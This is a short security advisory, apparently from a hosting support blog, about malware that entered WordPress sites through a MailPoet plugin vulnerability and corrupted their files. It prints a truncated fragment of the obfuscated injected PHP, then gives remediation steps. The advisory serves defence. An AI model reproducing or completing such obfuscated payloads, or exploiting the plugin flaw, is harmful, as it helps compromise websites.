Malware Infection Breaking WordPress Websites
There is a known malware infection caused by a serious vulnerability in the MailPoet WordPress plugin. This malicious attack attempts to slyly inject Spam into the hacked site, which is causing websites to break, and focuses predominantly on WordPress sites with outdated plugins or weak admin passwords.
What It Looks Like
The infected PHP code is very buggy and is corrupting legitimate website files, as well as themes and plugin files, which causes PHP errors to be displayed instead of website content:
Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91
After removing the infecting malware, the only way to remedy the issues is to restore the corrupted files from a backup. This is what the malware code looks like:
< ?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5?c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3?of:opjudovg< ~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)…
If you are running MailPoet, we recommend upgrading it to the latest version. If you do not have a firewall on your website, you have to upgrade the plugin or remove it altogether to avoid more issues.
If you aren’t able to fix the issue on your end, please don’t hesitate to contact Support. We’re happy to help.